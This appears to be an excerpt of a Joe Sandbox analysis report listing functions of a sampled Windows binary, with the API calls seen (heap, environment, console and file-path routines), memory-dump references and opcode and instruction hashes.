                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$FullNamePathwcschr
                                                                              • String ID:
                                                                              • API String ID: 1464828906-0
                                                                              • Opcode ID: 4608740039e49971374e978e9372c54a28b1034dfcf154244c984753711d5cb1
                                                                              • Instruction ID: 5121a60534c5088da3f425ffc7bd9783b1c035491c451f9f846efbbc24ff5113
                                                                              • Opcode Fuzzy Hash: 4608740039e49971374e978e9372c54a28b1034dfcf154244c984753711d5cb1
                                                                              • Instruction Fuzzy Hash: 6631D021B0C71A82E628BF15E40047EF761EB4DB90F54C634DA6AC33F2DEBDA8468700
                                                                              Function 00007FF64B58F358 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memset$DriveFullNamePathType
                                                                              • String ID:
                                                                              • API String ID: 3442494845-0
                                                                              • Opcode ID: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                                                              • Instruction ID: 78de0b59b98a57ed9cfc05a0f9a0eecbe6b0d763b9a601f6e80be3840d7e4492
                                                                              • Opcode Fuzzy Hash: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                                                              • Instruction Fuzzy Hash: 36318C32619BC5CAEB64EF11E8402E9B3A4FB8CB84F444125DA5D87B65CF38D645C700
                                                                              Function 00007FF64B578F80 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                              • String ID:
                                                                              • API String ID: 140117192-0
                                                                              • Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                              • Instruction ID: cfa12f293f86497b7d0ce65da92497bcf9422f509596eb44e01b0271735e66e7
                                                                              • Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                              • Instruction Fuzzy Hash: 9941D3B5A0CB41D1EA58BF08F980369A3A4FB8C784F504136DAAD827B6EF7CE544D700
                                                                              Function 00007FF64B578470 Relevance: 6.1, APIs: 4, Instructions: 72stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: wcstol$lstrcmp
                                                                              • String ID:
                                                                              • API String ID: 3515581199-0
                                                                              • Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                              • Instruction ID: 4d3ecf475a875306e5fc62bb377aad81af42ce388ff10c956add3c9fa5f5293d
                                                                              • Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                              • Instruction Fuzzy Hash: 1121C172B0C642C3E6687F7AE49413AEAA0FF4D794F159034CB6F82676DEACE4448600
                                                                              Function 00007FF64B564F58 Relevance: 6.1, APIs: 4, Instructions: 72filetimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: File_get_osfhandle$TimeWrite
                                                                              • String ID:
                                                                              • API String ID: 4019809305-0
                                                                              • Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                              • Instruction ID: 6083a5cd3d6902f9a52a75f20508cb0a78bd32e5043c4f03135e5fff570de42f
                                                                              • Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                              • Instruction Fuzzy Hash: 46316121A1C68687EB987F14E444378FA91AF4EB54F145238D96D83BF7CF7DD8948A00
                                                                              Function 00007FF64B591914 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memset$DriveNamePathTypeVolume
                                                                              • String ID:
                                                                              • API String ID: 1029679093-0
                                                                              • Opcode ID: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                                                              • Instruction ID: 2ea6c28de2d308244176cba7066b5bb8fdc11caae7bbcfadf9d531c5519294b5
                                                                              • Opcode Fuzzy Hash: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                                                              • Instruction Fuzzy Hash: 71315A72709AC1CAEB24AF21D8543E8A7A0FB8DB88F444135CA5D87755DF3CD655C700
                                                                              Function 00007FF64B58E810 Relevance: 6.1, APIs: 4, Instructions: 67fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                              • String ID:
                                                                              • API String ID: 2448200120-0
                                                                              • Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                              • Instruction ID: 2932bc57e44498076e95111d923c14ceea99f3b289695ac3a489c186c03eba85
                                                                              • Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                              • Instruction Fuzzy Hash: D1211A31A1CA46CBE6587F11E80027DF6A1EB8DB81F544539DA6E977A6CF3CE4528A00
                                                                              Function 00007FF64B577CF8 Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$AllocProcess
                                                                              • String ID:
                                                                              • API String ID: 1617791916-0
                                                                              • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                              • Instruction ID: 607175b9ee96f088fde5204cf0bb133fa0feda4842628f1e86e4902f0e1cf2bb
                                                                              • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                              • Instruction Fuzzy Hash: 86213D61B0DA41C6EA08BF55E910479E7A1EB8DBD0F589230DA2E877B6DE7CE4058600
                                                                              Function 00007FF64B566A48 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00007FF64B573C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF64B573D0C
                                                                                • Part of subcall function 00007FF64B573C24: towupper.MSVCRT ref: 00007FF64B573D2F
                                                                                • Part of subcall function 00007FF64B573C24: iswalpha.MSVCRT ref: 00007FF64B573D4F
                                                                                • Part of subcall function 00007FF64B573C24: towupper.MSVCRT ref: 00007FF64B573D75
                                                                                • Part of subcall function 00007FF64B573C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF64B573DBF
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B58EA0F,?,?,?,00007FF64B58E925,?,?,?,?,00007FF64B56B9B1), ref: 00007FF64B566ABF
                                                                              • RtlFreeHeap.NTDLL(?,?,?,00007FF64B58EA0F,?,?,?,00007FF64B58E925,?,?,?,?,00007FF64B56B9B1), ref: 00007FF64B566AD3
                                                                                • Part of subcall function 00007FF64B566B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF64B566AE8,?,?,?,00007FF64B58EA0F,?,?,?,00007FF64B58E925), ref: 00007FF64B566B8B
                                                                                • Part of subcall function 00007FF64B566B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF64B566AE8,?,?,?,00007FF64B58EA0F,?,?,?,00007FF64B58E925), ref: 00007FF64B566B97
                                                                                • Part of subcall function 00007FF64B566B84: RtlFreeHeap.NTDLL(?,?,?,?,00007FF64B566AE8,?,?,?,00007FF64B58EA0F,?,?,?,00007FF64B58E925), ref: 00007FF64B566BAF
                                                                                • Part of subcall function 00007FF64B566B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B566AF1,?,?,?,00007FF64B58EA0F,?,?,?,00007FF64B58E925), ref: 00007FF64B566B39
                                                                                • Part of subcall function 00007FF64B566B30: RtlFreeHeap.NTDLL(?,?,?,00007FF64B566AF1,?,?,?,00007FF64B58EA0F,?,?,?,00007FF64B58E925), ref: 00007FF64B566B4D
                                                                                • Part of subcall function 00007FF64B566B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B566AF1,?,?,?,00007FF64B58EA0F,?,?,?,00007FF64B58E925), ref: 00007FF64B566B59
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B58EA0F,?,?,?,00007FF64B58E925,?,?,?,?,00007FF64B56B9B1), ref: 00007FF64B566B03
                                                                              • RtlFreeHeap.NTDLL(?,?,?,00007FF64B58EA0F,?,?,?,00007FF64B58E925,?,?,?,?,00007FF64B56B9B1), ref: 00007FF64B566B17
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                                              • String ID:
                                                                              • API String ID: 3512109576-0
                                                                              • Opcode ID: 382550a8889551dd1746f9e05062d813c656d27a38cd142319c153c86f485295
                                                                              • Instruction ID: a168f4e345bd44f8360438def0dd496e93eddb39a3ad319ac62caadf2f10a295
                                                                              • Opcode Fuzzy Hash: 382550a8889551dd1746f9e05062d813c656d27a38cd142319c153c86f485295
                                                                              • Instruction Fuzzy Hash: 0E213E62A1DA86C6EB08BF65D4142B8BBA0EF5DB45F149035CA2E87376DF2CA445C350
                                                                              Function 00007FF64B56B6B0 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B56AF82), ref: 00007FF64B56B6D0
                                                                              • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B56AF82), ref: 00007FF64B56B6E7
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B56AF82), ref: 00007FF64B56B701
                                                                              • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B56AF82), ref: 00007FF64B56B715
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$Process$AllocSize
                                                                              • String ID:
                                                                              • API String ID: 2549470565-0
                                                                              • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                              • Instruction ID: 1fb132f81fb6ff4cc290d04afb98bc9060544de4570a06264b975538d8eae7f4
                                                                              • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                              • Instruction Fuzzy Hash: F9213062A0D686C6EE1CBF15E44107CF6A1FB8CB80B48A431DA6E83772DF7CE5458700
                                                                              Function 00007FF64B58CFF0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF64B57507A), ref: 00007FF64B58D01C
                                                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF64B57507A), ref: 00007FF64B58D033
                                                                              • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF64B57507A), ref: 00007FF64B58D06D
                                                                              • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF64B57507A), ref: 00007FF64B58D07F
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                              • String ID:
                                                                              • API String ID: 1033415088-0
                                                                              • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                              • Instruction ID: 66be31c84d7d3fbc2885ce01fd38e76b6e2fe21fb8add5cfbb28073cb071bd91
                                                                              • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                              • Instruction Fuzzy Hash: AE11513161C642C7D6486B11F45517AF7E0FB8EB95F405125EA9E87BA5DF3CD0458B00
                                                                              Function 00007FF64B585690 Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF64B585433,?,?,?,00007FF64B5869B8,?,?,?,?,?,00007FF64B578C39), ref: 00007FF64B5856C5
                                                                              • RtlFreeHeap.NTDLL(?,?,00000028,00007FF64B585433,?,?,?,00007FF64B5869B8,?,?,?,?,?,00007FF64B578C39), ref: 00007FF64B5856D9
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF64B585433,?,?,?,00007FF64B5869B8,?,?,?,?,?,00007FF64B578C39), ref: 00007FF64B5856FD
                                                                              • RtlFreeHeap.NTDLL(?,?,00000028,00007FF64B585433,?,?,?,00007FF64B5869B8,?,?,?,?,?,00007FF64B578C39), ref: 00007FF64B585711
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$FreeProcess
                                                                              • String ID:
                                                                              • API String ID: 3859560861-0
                                                                              • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                              • Instruction ID: 306446bb24485c6a1632d1ded80a2a3e160eebb33f4dfe213353dda41140a68c
                                                                              • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                              • Instruction Fuzzy Hash: B7114C72A08B81C6DB04AF56F4040ACBBB0F74DF84B488125DB5E43729DF38E556C740
                                                                              Function 00007FF64B579158 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                              • String ID:
                                                                              • API String ID: 140117192-0
                                                                              • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                              • Instruction ID: 68242c7f73a1e28ee12accdd80cf1cb6a6e5109442b3a9715bd70b2b59e4ad35
                                                                              • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                              • Instruction Fuzzy Hash: E121BEB6A1CB45D1EA48BF04E880369B3A4FB88B95F500136DA9D827B6DF7DE454D700
                                                                              Function 00007FF64B574AD0 Relevance: 6.0, APIs: 4, Instructions: 33memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B568798), ref: 00007FF64B574AD6
                                                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B568798), ref: 00007FF64B574AEF
                                                                                • Part of subcall function 00007FF64B574A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574A28
                                                                                • Part of subcall function 00007FF64B574A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574A66
                                                                                • Part of subcall function 00007FF64B574A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574A7D
                                                                                • Part of subcall function 00007FF64B574A14: memmove.MSVCRT(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574A9A
                                                                                • Part of subcall function 00007FF64B574A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574AA2
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B568798), ref: 00007FF64B57EE64
                                                                              • RtlFreeHeap.NTDLL(?,?,?,00007FF64B568798), ref: 00007FF64B57EE78
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                                                              • String ID:
                                                                              • API String ID: 2759988882-0
                                                                              • Opcode ID: 75675db4d9e082b6ee3134e55f7fee0755989425f88a4696f40f247a198a0c52
                                                                              • Instruction ID: f1af5193f340c2c7f981b4df830a0231ca804c334c856d6df8422f8a10a0f2c1
                                                                              • Opcode Fuzzy Hash: 75675db4d9e082b6ee3134e55f7fee0755989425f88a4696f40f247a198a0c52
                                                                              • Instruction Fuzzy Hash: 05F0E761B1DB42C6EE18BF66E404178EAE1EF8EB41F48D434CD2EC2362EE7CA5458710
                                                                              Function 00007FF64B5910D8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00007FF64B56CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B56B9A1,?,?,?,?,00007FF64B56D81A), ref: 00007FF64B56CDA6
                                                                                • Part of subcall function 00007FF64B56CD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF64B56B9A1,?,?,?,?,00007FF64B56D81A), ref: 00007FF64B56CDBD
                                                                              • wcschr.MSVCRT ref: 00007FF64B5911DC
                                                                              • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF64B58827A), ref: 00007FF64B591277
                                                                              Strings
